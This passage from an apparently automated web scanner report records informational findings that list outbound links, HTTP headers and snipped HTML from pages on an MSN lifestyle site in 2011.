</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.115. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&gt1=32002

The response contains the following links to other domains:

http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/MSN_Style
http://twitter.com/share
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.bing.com/?FORM=MSNS52
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?form=ALS&q=
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.essence.com/
http://www.essence.com/entertainment/allaccess/hairstyle_file_regina_king.php
http://www.essence.com/hair/hot_hair/hot_hair_hot_street_styles.php
http://www.essence.com/hair/hot_hair/hot_hair_short_naturals_1.php
http://www.essence.com/hair/hot_hair/hot_hair_strand_stars_to_watch_in_2011.php
http://www.essence.com/hair/hot_hair/hot_hair_tress_makeovers_essence_hair_issue_2010.php
http://www.facebook.com/MSNLife
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406199&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-look%2Fmakeup-skin-care-hair%2Fstaticslideshowessence.aspx%3Fcp-documentid%3D27338469%26gt1%3D32002&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:00 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ab081eafc6ab48328248f635b3cd494c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5A11BDAF050B42938876F45E82C6B8BF; domain=.redacted; expires=Thu, 18-Aug-2011 16:49:59 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 65638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406199&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-look%2Fmakeup-skin-care-hair%2Fstaticslideshowessence.aspx%3Fcp-documentid%3D27338469%26gt1%3D32002&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.essence.com"><img src="http://blstb.redacted/i/35/45EB806D89D4A1E3972FCC381B0.gif" width="90" height="30" alt="Essence" />
...[SNIP]...
<li class="first"><a href="http://www.essence.com/hair/hot_hair/hot_hair_hot_street_styles.php">Hot Hair: The Fiercest Street Styles</a>
...[SNIP]...
<li class=""><a href="http://www.essence.com/hair/hot_hair/hot_hair_tress_makeovers_essence_hair_issue_2010.php">Hot Hair: Tress Makeovers</a>
...[SNIP]...
<li class=""><a href="http://www.essence.com/entertainment/allaccess/hairstyle_file_regina_king.php">Hairstyle File: Regina King Through the Years </a>
...[SNIP]...
<li class=""><a href="http://www.essence.com/hair/hot_hair/hot_hair_strand_stars_to_watch_in_2011.php">Hot Hair: Strand Stars to watch in 2011 </a>
...[SNIP]...
<li class="last"><a href="http://www.essence.com/hair/hot_hair/hot_hair_short_naturals_1.php">Hot Hair: the Short Natural</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNS52"><span>
...[SNIP]...
lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&gt1=32002&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
yle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&gt1=32002&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XIDdx2jNbSlbrwbNpgiEWXrrKSwldzBQz?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVDVx7mtTIJY9353gvvnR1AlnHgv0TjbX?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X9OgAVb4XSzgOnR5-4feMtIJn-g5aby-Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XIai-q8n3t16U10iZQ0KzZoXSF7-6p2r9?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X1Fe3EMZPD2iv9gXlghF7p9YA4n9VlbgW?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&q=">See more results</a>
...[SNIP]...
<map id="imap" name="imap"><area href="http://www.facebook.com/MSNLife" alt="MSN Lifestyle" shape="rect" coords="245,1,277,25" /><area href="http://twitter.com/MSN_Style" alt="MSN Twitter" shape="rect" coords="279,3,300,25" /></map>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.116. http://lifestyle.redacted/your-look/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/video/

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-look/video/?from=en-us_msnhp

The response contains the following links to other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353363&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-look%2Fvideo%2F%3Ffrom%3Den-us_msnhp&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-look/video/?from=en-us_msnhp HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:23 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA16
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=da9fa5eca21f41b7bc9ef9d88bb965b3; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D969D46D91B9423384D0A7C5C6F7AC8A; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:23 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 20461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353363&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-look%2Fvideo%2F%3Ffrom%3Den-us_msnhp&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.117. http://lifestyle.redacted/your-look/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/video/

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-look/video/?from=en-us_msnhp

The response contains the following links to other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
